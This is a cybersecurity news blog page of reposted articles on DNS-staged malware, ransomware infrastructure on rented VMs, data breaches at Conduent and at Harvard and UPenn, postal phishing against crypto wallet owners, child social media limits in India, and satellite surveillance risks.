Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Strela Stealer Campaign
Detour Dog Threat Actor DNS Command And Control DNS Security Monitoring DNS TXT Record Exploit Initial Access Broker malware Strela Stealer Campaign

The Growing Threat of DNS Powered Email and Web Attacks


 

As an important component of the internet architecture, the Domain Name System has historically played the role of an invisible intermediary converting human intent into machine-readable destinations without much scrutiny or suspicion. However, this quiet confidence has now been put to the test. 

Research conducted by DomainTools has revealed a subtle yet consequential technique that redefines DNS into a covert delivery channel for malicious code rather than just a directory service. Rather than hosting payloads on compromised servers or suspicious domains, attackers fragment malware into tiny segments and embed them in DNS TXT records scattered across a variety of subdomains.

The fragments appear harmless when isolated, indistinguishable from legitimate configuration information. However, after systematically querying and reassembling-often by scripting PowerShell commands-the pieces combine to form fully functional malware. As a result of the implicit trust placed in DNS traffic and the limited visibility many organizations maintain over it, this methodical approach is inexpensive, methodical, and quiet. 

According to a report by Ars Technica, DNS infrastructure abuse is not merely theoretical. Threat actors have operationalized the technique in a manner that has been remarkable in its precision. In that instance, the malicious payload was converted into hexadecimal form and separated into hundreds of discrete chunks. As a result of the registration of whitetreecollective.com and generation of a large number of subdomains, the operators assigned each fragment to a distinct TXT record of the host. 

These records, individually, appeared to be indistinguishable from routine DNS metadata which is commonly used for verifying domains, authenticating email, and establishing service configurations. Collectively, however, they constitute a malware repository incorporated into the DNS infrastructure as a whole. Upon establishing foothold access inside a target environment, the reconstruction process did not require any more conspicuous methods than a series of DNS queries. 

Each encoded fragment was retrieved individually using scripted queries, which allowed the payload to be assembled in memory without the need for conventional file downloads or suspicious HTTP traffic. This retrieval mechanism blends seamlessly into ordinary network activity since DNS requests are ubiquitous and rarely subject to deep inspection, particularly in environments requiring encrypted resolvers. 

Even though DNS tunneling has long been associated with data exfiltration and command-and-control communications, the deliberate hosting of malicious payloads across TXT records represents a more assertive evolution in this area. 

Through the campaign, people illustrate the importance of comprehensive DNS telemetry, anomaly detection, and policy enforcement within modern enterprise security architectures, and demonstrate how foundational internet protocols, when inadequately monitored, can be repurposed into resilient delivery channels. 

Furthermore, investigations into DNS-enabled threat infrastructure revealed the activities of a threat actor identified as Detour Dog, who was the key enabler for campaigns to distribute the Strela Stealer malware. In accordance with Infoblox analysis, the actor is in control of domains hosting the initial malware component a lightweight backdoor called StarFish that is used to deliver the malware chain. 

During the first stage, the implant functions as a reverse shell, establishing a persistent communication channel that facilitates retrieving and executing the Strela Stealer payload. Informationblox has been tracking Detour Dog since August 2023, when Sucuri, a company owned by GoDaddy, reported security breaches targeting WordPress sites. 

Early operations involved the injection of malicious JavaScript into compromised websites to serve as covert command channels for traffic distribution systems using DNS TXT records. Visitors were silently directed to malicious sites or fraudulent pages.

Historical telemetry indicates a sustained and evolving presence of the actor since February 2020, suggesting that its infrastructure extends back as far as February 2020. Operational model has since matured. Where redirects once supported scams, DNS-based command-and-control frameworks now permit staged execution of remote payloads. 

According to IBM X-Force, StarFish is delivered through weaponized SVG files, enabling persistent attacks and hands-on access to compromised systems. A financially motivated operator has been identified as Hive0145 since at least 2022 as the sole operator responsible for the Strala Stealer, a criminal operation that has been functioning as an initial access broker monetizing unauthorized access to networks by reselling them to other criminals. 

Further, Detour Dog's DNS infrastructure was found to play a major role in 69 percent of confirmed StarFish staging hosts, highlighting its central role in the broader campaign. Additionally, the attack chain included a MikroTik-based botnet, marketed as REM Proxy, which was armed with SystemBC malware previously analyzed by Black Lotus Labs at Lumen Technologies. 

In addition to REM Proxy, Tofsee botnet, which historically propagated through PrivateLoader C++ loader, was also responsible for spam emails that delivered Strela Stealer. Detour Dog's infrastructure consistently hosted the first-stage payload on both distribution pathways, confirming the actor's role as a crucial DNS-centric facilitator within Strela's ecosystem.

When Detour Dog first emerged as a threat intelligence source, its activities seemed relatively simple. The primary use of compromised websites was to redirect visitors to fraudulent advertising networks, scam websites, and deceptive CAPTCHA pages that are intended to generate illegal revenue through forced clicks. However, telemetry indicated a strategic shift by late 2024. 

Initially, the infrastructure served as a traffic monetization strategy, but it soon became a distribution backbone for materially more dangerous payloads. A DNS-centric framework was observed to facilitate the delivery of Strela Stealer, a family of malware that steals information associated with the threat actor Hive0145, in mid-2025. 

The Strela campaigns, usually initiated through malicious email attachments themed around invoices, are intended to exfiltrate user credentials, session information, and host information stored in browsers. There is no indication that Detour Dog directly hosts final-stage malware binaries.

In reality, it appears to operate as a DNS relay layer, resolving staged instructions and retrieving remote payloads from attacker-controlled servers before relaying them through compromised web assets. Indirection obscures the true origin of malware and complicates the static blocking process. A detailed description of Detour Dog's operation remains unclear. It is unclear whether it functions solely as an infrastructure provider or concurrently runs its own campaigns. 

According to an analysis of infrastructure overlap and domain control, Detour Dog has provided DNS channels to other operators, including Hive0145, for distribution of payloads. According to internal research, nearly two-thirds of the staging domains associated with recent campaigns are controlled by Detour Dog, suggesting a delivery-for-hire model as opposed to a single threat operation whose focus is on a single, isolated threat. 

The primary entry point into the ecosystem continues to be email. Malicious attachments often masquerade as invoices or business documents and initiate a multi-stage infection process. This documentation does not embed the final payload in its entirety, but instead refers to compromised domains that query Detour Dog's name servers for further instructions.

By using DNS lookups as a precursor to remote execution, ostensibly benign clicks can be transformed into covert downloads and staging sequences as a result of a server-side retrieval process. Mass distribution has been linked to botnets such as REM Proxy, a MikroTik-based network, and Tofsee, while Detour Dog provides persistent hosting and DNS command and control relays to protect backend infrastructure against direct exposure. 

The segmentation of responsibilities reflects the increasingly modular nature of cybercriminals' supply chains. Among the groups, one manages spam dissemination, another provides DNS and hosting infrastructure resilience, and a third develops and operates the information-stealing payload. Such compartmentalization makes attribution and disruption difficult. 

A single component rarely dismantles an operation; actors can reconstitute infrastructure or redirect traffic in a matter of seconds if a single component is removed. As such, defensive strategies must include DNS-layer intelligence capable of detecting anomalous TXT record queries as well as covert command channels prior to downstream payload execution.

The example of Detour Dog demonstrates how foundational internet protocols can be used to deliver stealth payloads. It has been observed that threat actors embed malicious orchestration in routine DNS activity to transform everyday web traffic into an unobtrusive mechanism to deliver malware and exfiltrate data. 

As part of the prevention of this class of threat, organizations should elevate DNS from a background utility to a frontline security control by integrating visibility, validation, and enforcement across both email and resolution layers. There are wider implications for security leaders than just a single campaign or actor. 

Adversaries have begun weaponizing core internet infrastructure in a structural way by combining email lures, DNS staging, and modular malware services. Defense systems based primarily on perimeter filtering and endpoint detection are unlikely to identify threats that arise through routine name resolution. 

In order to maintain DNS observability, organizations must implement a strategy that correlates resolver telemetry with email security signals, enforces strict egress policies, verifies record integrity, and integrates threat intelligence into recursive as well as authoritative layers. 

DNS configuration auditing, anomaly detection of irregular TXT record patterns, and rigorous segmentation of web-facing assets are three effective ways to reduce exposure. As adversaries continue to operationalize trusted protocols for covert delivery, resilience will increasingly rely on disciplined architectural design that treats DNS as a decisive defense line rather than a background infrastructure.
Read more »
User Privacy
Conduent Data Breach Data Leak Ransomware attack User Privacy

Conduent Data Breach Expands to Tens of Millions of Americans

 

A massive data breach at Conduent, a leading government technology contractor, has escalated dramatically, now affecting tens of millions of Americans across multiple states. Initially detected in January 2025, the intrusion originated from an unauthorized access on October 21, 2024, allowing hackers to lurk undetected for nearly three months. Recent disclosures reveal the scope far exceeds early estimates, with Texas alone reporting 15.4 million victims, Oregon 10.5 million, and additional hundreds of thousands in Washington, Maine, and beyond.

Conduent provides critical back-end services like payments, printing, and processing for state agencies, transit systems, and insurers serving over 100 million users nationwide. The stolen data trove includes highly sensitive details: names, Social Security numbers, dates of birth, medical records, health insurance IDs, and treatment information. This breach, linked to ransomware group SafePay, exposes victims to severe identity theft and fraud risks, prompting lawsuits and regulatory scrutiny.

The cyberattack disrupted operations briefly, delaying child support payments in states like Wisconsin and affecting insurers such as Premera Blue Cross and Blue Cross Blue Shield of Montana. Conduent, aided by Palo Alto Networks and other forensics experts, secured systems swiftly but incurred $25 million in direct response costs by Q1 2025. No misuse of data has surfaced as of late 2025 notifications, but experts warn of looming phishing and extortion campaigns.

Legal fallout has been swift, with at least nine class-action suits filed over the 10.5 million+ record exposure, marking it as 2025's largest healthcare breach.Notifications began rolling out in October 2025 to state attorneys general in Maine, California, and others, advising credit freezes and fraud alerts—without offering free monitoring. Victims, primarily government program beneficiaries, face heightened vulnerability in an era of persistent ransomware targeting public sector vendors.

Cybersecurity analysts highlight Conduent's prolonged undetected access as a stark reminder of supply chain risks in govtech. The firm's SEC filings underscore ongoing financial strain from notifications and potential liabilities. As investigations continue into 2026, this incident amplifies calls for stricter vendor oversight and zero-trust architectures in handling citizen data.

In response, affected states and insurers urge proactive measures: monitor credit reports, enable multi-factor authentication, and watch for suspicious IRS or healthcare scams. Conduent assures full cooperation with authorities, but the ballooning victim count underscores the fragility of centralized data troves in government services.This breach serves as a pivotal case study in evolving cyber threats to public infrastructure.
Read more »
Virtual Machine Abuse
Bulletproof hosting command and control servers ISPsystem VMmanager malware Ransomware Infrastructure Virtual Machine Abuse

ISPsystem VMs Hijacked for Silent Ransomware Distribution


 

The evolution of cybercrime has led to infrastructure becoming less of a matter of ownership and more of a convenience issue. As opposed to investing time and resources in the construction and maintenance of dedicated command-and-control servers, ransomware operators are increasingly renting inexpensive virtual machines that blend seamlessly into legitimate hosting environments as a practical alternative. 

As a result of this shift, attackers have enhanced their operational strategy by embedding their activities within widely used infrastructure, thereby gaining scalability, plausible deniability, and operational resilience. 

In the event of the disruption of one node, dozens, sometimes hundreds, of nearly identical systems continue to run in parallel, ensuring that campaigns continue uninterrupted. 

Sophos investigators, following this operational shift, identified a series of recent WantToCry ransomware attacks that were triggered by virtual machines that were provisioned through infrastructure managed by ISPsystem, a legitimate provider of virtualization and hosting control panels. 

In forensic analysis of several incidents, researchers observed an underlying pattern: attackers controlled Windows virtual machines whose hostnames were the same. 

As the systems appeared to have been deployed using default Windows templates from ISPsystem's VMmanager platform, it can be deduced that threat actors were utilizing standardized rather than customized builds. 

Based on the correlation between telemetry and sinkhole data, it was found that the same hostname conventions were shared among infrastructures associated with multiple ransomware operations, including LockBit, Qilin, Conti, BlackCat, also known as ALPHV, and Ursnif, a banking trojan. In addition to ransomware, infrastructure overlaps with campaigns distributing information-stealing malware, such as RedLine and Lumma. 

A high frequency of identical system identifiers between geographically dispersed incidents indicates the reuse of templates rather than isolated deployments within the virtual environment. ISPsystem's VMmanager platform facilitates rapid provisioning and lifecycle management of Windows and Linux virtual machines, making it widely used by hosting providers. 

According to Sophos, the default Windows images in VMmanager use the same hostname and certain system identifiers upon deployment. Within benign environments, such uniformity may go unnoticed, while within hostile environments, it becomes a disguise.

The bulletproof hosting operators exploit this architectural feature by enabling their clients to instantiate virtual machines en masse, which allow malicious command-and-control and payload delivery servers to be embedded within pools of otherwise legitimate systems. The result is infrastructure dilution: malicious nodes become statistically indistinguishable from thousands of benign peers, resulting in a challenge in attribution efforts and a reduced likelihood of swift remediation. 

Several of these virtual machines had a concentration that was not evenly distributed. A significant proportion were traced to a small number of hosting providers with history of abuse complaints or regulatory scrutiny, such as Stark Industries Solutions Ltd., Zomro B.V., First Server Limited, Partner Hosting LTD, and JSC IOT. 

Moreover, researchers identified MasterRDP as a recurrent element in the ecosystem, providing VPS and RDP services that are resistant to legal intervention while maintaining direct control over physical infrastructure. The Sophos analysis revealed that over 95 percent of ISPsystem virtual machines with internet-facing hostnames came from four default Windows hostnames generated by ISPsystems. 

There was a correlation between each of these identifiers and detected cybercriminal activity, strengthening the assertion that templated infrastructure is being systematically repurposed to sustain large-scale ransomware and malware operations. 

After expanding their dataset, the researchers identified over 7,000 internet-facing servers sharing one autogenerated hostname, which were spread across Russian, multiple European countries, the United States, as well as Iran and Israel. According to Sophos' Counter Threat Unit, two hostnames in particular recurred consistently both in the WantToCry investigation and in the reporting of general threat intelligence. 

The identifiers identified in this report were not restricted to one particular campaign. Observations from third parties and telemetry correlated them with operations involving LockBit, Qilin, and BlackCat, as well as NetSupport RAT deployments. 

Among the uses of these systems have been host-and-control servers for ransomware, secondary malware payloads distribution, phishing campaigns, botnet management, and staging exfiltrated data for monetization. This pattern of reusable infrastructure templates is likely to have persisted for a minimum of five years, according to investigators.

Ironically, despite the strategy reducing operational costs and speeding up deployment for threat actors, it introduces a measurable signature. Defenders can benefit from the widespread reuse of static hostnames across thousands of ISPsystem-provided virtual machines by clustering these hosts into clusters that can be useful for attribution and campaign tracking. 

Virtual machines were identified by a narrow group of hosting providers, including several companies which have been repeatedly linked to cybercriminal or state-sponsored activity. According to Sophos, some legitimate traffic may originate from these environments, however additional intelligence identifies Stark Industries Solutions Ltd. as the most prominent provider.

Cybercriminal ecosystems and Russian state-sponsored operations are linked to First Server Limited and First Server Limited. Regulatory scrutiny has followed the establishment of Stark Industries in early 2022, shortly prior to the Russian invasion of Ukraine. Several threat groups have been observed to leverage Stark Industries' infrastructure since that time. 

Stark Industries Solutions and its operators were imposed restrictive measures by the European Council in May of last year for their involvement in destabilizing activities by Russian state-affiliated actors, based on their role in facilitating such activities.

Due to its apparent connection with Doppelganger, a Russian disinformation campaign sanctioned by the UK government in October 2024, First Server Limited has also received attention. According to our assessment, MasterRDP is among a number of bulletproof hosting providers that lease ISPsystem managed virtual machines on abuse-tolerant infrastructure to customers who conduct ransomware and malware operations. 

ISPsystem's VMmanager remains a viable and widely used virtualization management platform in the global hosting industry, according to researchers. The software itself is not inherently malicious; however, it is attractive to threat actors seeking scalable infrastructure due to its low cost, ease of onboarding, and rapid deployment capabilities. 

A combination of its widespread user base with its extensive ubiquity allows malicious deployments to maintain operational cover, enabling ransomware and malware campaigns to persist among thousands of routine, compliant virtual machine instances. As a result of these findings, the hosting ecosystem is facing a broader structural challenge. 

Because virtualization platforms reduce infrastructure deployment barriers, security responsibility is increasingly shifting away from providers, resellers, and enterprise customers to ensure that template hygiene is implemented effectively, unique system identifiers are enforced, and anomalous clustering patterns are monitored.

As a result of proactive hostname randomization, stronger customer vetting, transparency in abuse response, and cross-industry intelligence sharing, threat actors may be less likely to use templated infrastructure. 

As demonstrated by these consistent artifacts exposed in the campaign, even commoditized infrastructure leaves discernible patterns behind. It will not be sufficient to dismantle individual malicious nodes. Instead, it will be necessary to address the systemic weaknesses that allow legitimate technology to be silently adapted for large-scale, persistent cybercrime operations.
Read more »
Technology
Chelsea Cyber Attacks data intrusion Kensington London Technology

London Boroughs Struggle to Restore Services After November Cyber Attack




A cyber intrusion identified on November 24, 2025 has disrupted essential local authority services in two central London boroughs, freezing parts of the property market and delaying administrative functions.

The Royal Borough of Kensington and Chelsea and Westminster City Council have both been unable to operate several core systems since the breach was detected. Although Kensington and Chelsea is internationally associated with high-value homes, luxury retail outlets and tree-lined residential streets, routine civic operations in the borough are currently under strain.

A notice published on the Kensington and Chelsea council website states that disruption is expected to continue for several more weeks and that restoring all services may take months.

According to HM Land Registry figures, approximately 2,000 property transactions occur annually within Kensington and Chelsea. Many of those transactions are now impacted because the councils cannot conduct local authority searches. These searches are mandatory checks that examine planning history, land charges, infrastructure proposals and regulatory constraints linked to a property.

Nick Gregori, Head of Research at property data platform LonRes, explained that local authority searches are fundamental to the conveyancing process. Buyers relying on mortgage financing cannot secure loans without completed searches. Even purchasers using cash are advised to obtain them to ensure proper due diligence.

Jo Eccles, founder of buying agency Eccord, said two of her clients purchasing in Westminster have had to obtain indemnity insurance because official searches are not expected to resume until April due to accumulated delays. She noted that private banks are sometimes willing to proceed with indemnity-backed transactions, whereas retail lenders are generally less accommodating.

Robert Green, Head of Sales at John D Wood & Co. in Chelsea Green, stated that indemnity policies do not eliminate the need for careful investigation. Solicitors are attempting to reconstruct due diligence by reviewing historical documentation held by sellers or from previous acquisition files. Buyers without access to private lending or substantial liquidity are finding transactions extremely difficult to complete.

Planning services have also stalled. Architect Emily Ceraudo has two projects paused: one involving listed building consent in South Kensington and another concerning a mansard roof extension in Mayfair. She said clients initially struggled to accept that the entire planning system could remain offline for this duration, prompting her to share official correspondence confirming the cause of delay. Councils have indicated that some applications may be processed offline, but no revised timeframe has been provided.

There are reports of contractors reconsidering site activity and some clients contemplating proceeding with works in anticipation of retrospective approval.

Housing benefit payments were also interrupted. Laurence Turner, who rents a studio flat in Chelsea to an elderly tenant with medical needs, said he only became aware of the issue after two missed payments. He emphasized that he has no contractual relationship with the council and that his tenant had consistently paid rent early for five years. His letting agent, Maskells, contacted the council for clarification. Payments due in mid-December and mid-January were missed, leaving £2,870 outstanding before funds were eventually received.

Turner observed that council service charges were skipped once in mid-December but resumed in mid-January, whereas housing benefit was missed twice. He acknowledged that municipal financial systems are complex and that he may not see the full administrative context.

Neither borough has provided a definitive restoration date. Kensington and Chelsea stated that systems are being reactivated gradually under guidance from NCC Group, the Metropolitan Police and the National Cyber Security Centre. Property searches are expected to return as soon as possible, with a limited search service available before full restoration.

Council Leader Cllr Elizabeth Campbell described the incident as a n intricate criminal cyber attack. She said prior investment in digital, data and technology infrastructure, including updated cyber defence systems, helped reduce overall damage. She confirmed that the planning system is undergoing checks, that new planning applications cannot progress beyond validation, and that local land charge searches remain unavailable. She added that £10 million in housing benefits has been issued since the incident and that recovery work continues with specialist partners to ensure systems are restored safely and with strengthened resilience. 

Read more »
under 16 social media law
age verification online AI Australia social media restrictions Child Online Safety India social media ban Social Media Technology under 16 social media law

India Sees Rising Push for Limits on Children’s Social Media Access

 

A growing conversation around restricting social media access for children under 16 is gaining traction across India, with several state leaders reviewing regulatory models adopted overseas — particularly in Australia.

Ministers from at least two southern states have indicated that they are assessing whether prohibiting minors from using social media could effectively shield children from excessive online exposure.

Adding weight to the debate, the latest Economic Survey — an annual report prepared by a team led by India’s chief economic adviser suggested that the central government explore age-based controls on children’s social media usage. While the survey does not mandate policy action, its recommendations often influence national discussions.

Australia’s Precedent Sparks Global Debate

Australia recently became the first nation to prohibit most social media platforms for users under 16. The law requires companies to verify users’ ages and deactivate accounts belonging to underage individuals.

The decision drew criticism from tech platforms. As Australia’s internet regulator told the BBC last month, companies responded to the framework "kicking and screaming - very very reluctantly".

Meanwhile, lawmakers in France have approved a bill in the lower house seeking to block social media access for children under 15; the proposal now awaits Senate approval. The United Kingdom is also evaluating similar measures.

In India, LSK Devarayalu of the Telugu Desam Party — which governs Andhra Pradesh and supports Prime Minister Narendra Modi’s federal coalition — introduced a private member’s bill proposing a ban on social media use for children under 16. Although such bills rarely become law, they can influence legislative debate.

Separately, the Andhra Pradesh government has formed a ministerial group to examine international regulatory models. It has also invited major technology firms, including Meta, X, Google and ShareChat, for consultations. The companies have yet to respond publicly.

State IT Minister Nara Lokesh recently wrote on X that children were "slipping into relentless usage" of social media, affecting their attention spans and academic performance.

"We will ensure social media becomes a safer space and reduce its damaging impact - especially for women and children," he added.

In Goa, Tourism and IT Minister Rohan Khaunte confirmed that authorities are studying whether such restrictions could be introduced, promising further details soon.

Similarly, Priyank Kharge, IT Minister of Karnataka — home to Bengaluru, often dubbed India’s Silicon Valley — informed the state assembly that discussions were underway on responsible artificial intelligence and social media use. He referenced a “digital detox” initiative launched in partnership with Meta, involving approximately 300,000 students and 100,000 teachers. However, he did not clarify whether legislative action was being considered.

Enforcement and Legal Hurdles

Experts caution that implementing such bans in India would be legally and technically complex.

Digital rights activist Nikhil Pahwa pointed out that enforcing state-level prohibitions could create jurisdictional conflicts. "While companies can infer users' locations through IP addresses, such systems are often inaccurate. Where state boundaries are very close, you can end up creating conflicts if one state bans social media use and another does not."

He also underscored the broader issue of age verification. "Age verification is not simple. To adhere to such bans, companies would effectively have to verify every individual using every service on the internet," Pahwa told the BBC.

Even in Australia, some minors reportedly bypass restrictions by entering false birth dates to create accounts.

According to Prateek Waghre, head of programmes at the Tech Global Institute, successful enforcement would hinge on platform cooperation.

"In theory, location can be inferred through IP addresses by internet service providers or technology companies, but whether the companies operating such apps would comply, or challenge such directions in court, is not yet clear," he says.

Broader Social Concerns

While lawmakers acknowledge the risks of excessive social media exposure, some analysts argue that a blanket ban may be too narrow a solution.

A recent survey of 1,277 Indian teenagers by a non-profit organisation found that many accounts are created with assistance from family members or friends and are often not tied to personal email addresses. This complicates assumptions of individual ownership central to age-verification systems.

Parents remain divided. Delhi resident Jitender Yadav, father of two young daughters, believes deeper issues are at play.

"Parents themselves fail to give enough time to children and hand them phones to keep them engaged - the problem starts there," he says.

"I am not sure if a social media ban will help. Because unless parents give enough time to their children or learn to keep them creatively engaged, they will always find ways to bypass such bans," he says.

As the discussion unfolds, India faces a complex balancing act — safeguarding children online while navigating legal, technological and social realities.
Read more »
online trading
Bitcoins Cryptocurrency Threats Crypto Market Crypto Risk Crypto Safety cryptocurrency Cyber Security online trading

Cryptocurrency Market Slump Deepens Amid Global Tech Selloff and Risk-Off Sentiment

 

Now falling, the crypto market feels strain from turmoil spreading beyond tech stocks worldwide. As investors pull back sharply, digital currencies take a hit alongside firms that list Bitcoin on their books. When one part shakes, others follow - worry grows over how deeply losses might spread through finance and tech alike. 

A sharp drop hit Bitcoin lately, pushing prices toward their weakest point since early 2023. Nearly $12 down for every hundred just yesterday, it now trades near sixty thousand dollars, according to figures on CoinMarketCap. Once hovering near seventy-two thousand, the descent has been relentless. Four months back, it stood at about one hundred twenty-six thousand - today, less than half remains. 

This plunge highlights how deeply the current market retreat is cutting. What stands clear is how ongoing sell-offs, paired with steady withdrawals from spot Bitcoin ETFs, weigh heavily on price direction. Around $60,000, any upward movement in Bitcoin has stalled - this pattern, according to Pi42's co-founder and chief executive, Avinash Shekhar, shapes a guarded mindset among investors. Each time gains slip away, trust in short-term rebound weakens. With swings growing sharper, hesitation lingers in trader behavior. 

Even after a steep drop, Bitcoin showed signs of steadiness around $65,000 by Friday morning in Indian markets. Still, the overall market value fell almost 9 per cent, landing near $1.3 trillion. Trade spiked dramatically - volume climbed above 90 per cent - as approximately $143 billion in Bitcoin shifted in just one day. Around half of all cryptocurrency investors kept leaning toward major coins under pressure, with Bitcoin holding nearly 58 per cent share. Stability returned slowly while trading intensity stayed high. Despite stronger signals elsewhere, wider economic pressures continue to cloud investor mood. 

According to Giottus chief executive Vikram Subburaj, conditions now reflect a typical pullback environment - liquidity shrinks while buyers hesitate and global concerns linger without resolution. When examined closely, shrinking exchange-traded fund flows along with strained blockchain metrics have together dampened appetite for crypto holdings, deepening the drop seen over recent seven-day periods. This drop marks the toughest stretch for digital currencies since last October, just ahead of Donald Trump securing the presidency amid pro-crypto signals throughout his run. 

Not only Bitcoin feels the heat - Ethereum, BNB, Solana, XRP, Dogecoin, Cardano, and Bitcoin Cash all slid 9 to 13 percent in tandem. Sector-wide losses suggest a widespread pullback, not an isolated dip. Despite earlier momentum, confidence now appears fragile across major assets. Besides the plunge, crypto's overall market value now sits near $2.22 trillion. That fall means losses exceeding $2 trillion since the high mark of about $4.39 trillion seen in October 2025, nearly half vanishing within only four weeks. Rather than stabilizing, investor mood has soured due to swings in metals like gold and silver - normally seen as secure - alongside slumping stock markets. 

Because of these shifts, appetite for risk-heavy assets has cooled noticeably. Despite weaker US job figures and rising worries over big spending in AI, the cryptocurrency space stays under pressure, says Akshat Siddhant of Mudrex. Because global markets show caution, downward trends hold firm for now. Yet, within this pullback, patient Bitcoin holders might find pockets of value worth watching closely. Though short-term volatility lingers, the broader downturn isn’t seen as a total barrier to strategic entry points. Following such dips carefully could matter more than reacting fast.
Read more »
snail mail
cryptocurrency Cyber Fraud forged letterheads Hardware Wallets Ledger phishing snail mail

Fraudsters Use Postal Mail to Target Crypto Hardware Wallet Owners



Cybercriminals are using traditional mail services to target cryptocurrency users who own hardware wallets manufactured by Trezor and Ledger. The attackers are distributing printed letters that falsely present themselves as official security notifications and attempt to trick recipients into revealing their wallet recovery phrases.

The letters instruct users to complete a compulsory “Authentication Check” or “Transaction Check,” claiming this step will soon become mandatory. Recipients are warned that failure to comply before stated deadlines could result in disrupted wallet functionality. One Trezor-themed letter sets February 15, 2026 as the cutoff date, while a Ledger-branded version references October 15, 2025.

The correspondence appears professionally formatted and claims to originate from internal security or compliance departments. In a case shared publicly by cybersecurity researcher Dmitry Smilyanets, a Trezor-related letter stated that authentication would soon be enforced across devices and urged users to scan a QR code to prevent interruption of Trezor Suite access. The letter further asserted that even if users had already enabled authentication on their device, they must repeat the process to ensure full activation and synchronization of the feature.

The QR codes direct recipients to fraudulent domains including trezor.authentication-check[.]io and ledger.setuptransactioncheck[.]com. At the time of reporting, the Ledger-linked domain was inactive, while the Trezor-related site remained accessible but displayed a phishing warning from Cloudflare.

The Trezor-themed phishing page states that users must complete authentication by February 15, 2026 unless they purchased specific models, including Trezor Safe 7, Safe 5, Safe 3, or Safe 1, after November 30, 2025, in which case the feature is allegedly preconfigured. After selecting “Get Started,” users are warned that ignoring the process could lead to blocked access, transaction signing errors, and complications with future updates.

Those who continue are prompted to enter their wallet recovery phrase. The form accepts 12-, 20-, or 24-word phrases and claims the information is necessary to confirm device ownership. Technical analysis shows that submitted phrases are transmitted through a backend endpoint located at /black/api/send.php on the phishing domain.

With access to the recovery phrase, attackers can restore the wallet on another device and transfer funds.

The method used to identify recipients remains unclear. However, both manufacturers have experienced past data breaches that exposed customer contact information, potentially increasing targeting risks.

Although email-based crypto phishing is common, physical mail scams remain relatively uncommon. In 2021, attackers mailed tampered Ledger devices designed to capture recovery phrases during setup. A similar postal campaign targeting Ledger users was reported again in April.

A recovery phrase, also called a seed phrase, represents the private cryptographic key controlling a cryptocurrency wallet. Anyone who obtains it gains complete control over the associated funds.

Legitimate hardware wallet providers do not request recovery phrases through mail, QR codes, websites, or email. The phrase should only be entered directly on the hardware device during a genuine restoration process.



Read more »
ShinyHunters
Data Breach Data Leak Harvard Breach Upenn Hack ShinyHunters

ShinyHunters Leak Exposes Harvard and UPenn Personal Data

 

Hacking group ShinyHunters has reportedly published more than a million records stolen from Harvard University and the University of Pennsylvania (UPenn) on its dark web site, putting a vast trove of sensitive personal data within reach of cybercriminals worldwide. The leaked data appears to contain sensitive details about the students, employees, alumni, donors, and family members of the breached organizations. This has expanded the scope of the compromised data to a wide range of people. Initial verification of the leaked data has revealed that at least some of the leaked data is genuine. 

The UPenn breach is believed to have begun in early November 2025, when the hackers gained access to an employee’s single sign-on (SSO) account by claiming to have obtained full access to the UPenn employee’s SSO account. This has essentially turned the SSO account into a master key that has allowed the hackers to access the UPenn VPN system, Salesforce data, the Qlik analytics platform, SAP business intelligence tools, and SharePoint. During the course of the attack, the hackers also used the compromised login credentials to send offensive emails to 700,000 people. Initially, UPenn believed that the emails were fake, but they later turned out to be real.

Harvard confirmed a related compromise roughly three weeks after the UPenn disclosure, tying its own incident to a successful voice phishing (vishing) campaign. In this case, attackers are said to have infiltrated Alumni Affairs and Development systems, exposing data on past and present students, donors, some faculty and staff, and even spouses, partners, and parents of alumni and students. The stolen records reportedly include names, dates of birth, home addresses, phone numbers, estimated net worth, donation history, and sensitive demographic attributes such as race, religion, and sexual orientation.

Unlike traditional ransomware operations that both encrypt systems and steal data, ShinyHunters appears to have focused solely on data theft and extortion, deploying no encryptors in these campaigns. The group allegedly attempted to negotiate payment in cryptocurrency in exchange for promising to delete the stolen files, following the now-common double extortion model. When talks broke down and the universities did not pay, the hackers responded by dumping the data openly on their dark web leak site, amplifying the risk of identity theft, harassment, and targeted scams for victims.

For Harvard and UPenn, the breaches highlight the dangers of over-reliance on SSO accounts and human-centric weaknesses such as vishing, where convincing phone calls trick staff into revealing or approving access. For affected individuals, the publication of highly personal and demographic information raises concerns around fraud, doxxing, discrimination, and reputational harm that could persist for years. The incidents reinforce the need for stronger multifactor authentication, rigorous phishing and vishing awareness training, and tighter controls around high-value institutional accounts holding large volumes of sensitive data.
Read more »
global communication
Aerospace aerospace giant communication Cyber Defence Cyber Security global communication

Inspector Satellites and Orbital Security Risks in Modern Space Infrastructure

 

Not far from familiar orbits, small satellites labeled as inspectors are starting to raise questions about safety above Earth. Lately, signs point to Russian vehicles moving near critical communication platforms - moves seen as unusually close by many experts. Such actions stir unease across national authorities, military planners, and firms tied to satellite networks worldwide. Little by little, these events reveal a shift: space no longer just a zone of cooperation, but one where watching, listening, and taking position matter more than before. 

One way to look at it is through military and spy evaluations: the spacecraft known as Luch-1 and Luch-2 belong to Moscow’s fleet meant for monitoring other orbiting machines. Tracking records show Luch-2, sent up in March 2023, moving unusually close to more than a dozen European satellites. High above Earth - about 36,000 km - the craft operates within an orbital belt where units stay locked over one spot on the ground. 

High above Earth, geostationary orbit holds unique importance. Satellites here handle telecom signals, national defense networks, TV broadcasts, storm tracking, along with classified government links. Since each craft stays fixed above one spot on the planet, services remain constant across time zones and emergencies alike. Should an unknown satellite shift close without warning, such movement draws immediate attention from control centers worldwide. 

Security experts in Europe suspect the Luch satellites could be tapping into transmissions from several regional communication platforms. Radio links, tightly aimed between Earth terminals and orbiting craft, carry these exchanges. Sitting close to those pathways - either incoming or outgoing - a satellite might pick up what is sent, particularly when protective coding is weak or old. Gathering such information counts as signal surveillance, known as SIGINT; doing so from space offers ongoing reach into critical traffic streams. 

Worry isn’t limited to public infrastructure alone. Some of these orbiting platforms were said to serve private businesses alongside national agencies, backing up operations like those run by Intelsat. Because they fulfill civilian and strategic roles, their vulnerability grows - today’s armed forces lean on commercial space links for communication channels, moving information, and reaching remote computing resources. When such networks face interference, consequences may ripple through military planning, disaster reaction setups, air traffic messaging, or the synchronization of banking transfers. 

Not just monitoring, but deliberate meddling raises concern among authorities. Close-orbiting satellites might, under certain conditions, disrupt communications through signal manipulation or noise flooding. Even without crashes in space, proven precision in approaching vital infrastructure alters strategic calculations globally. Repeated incidents targeting British military satellite links confirm combat now extends beyond ground-based systems. 

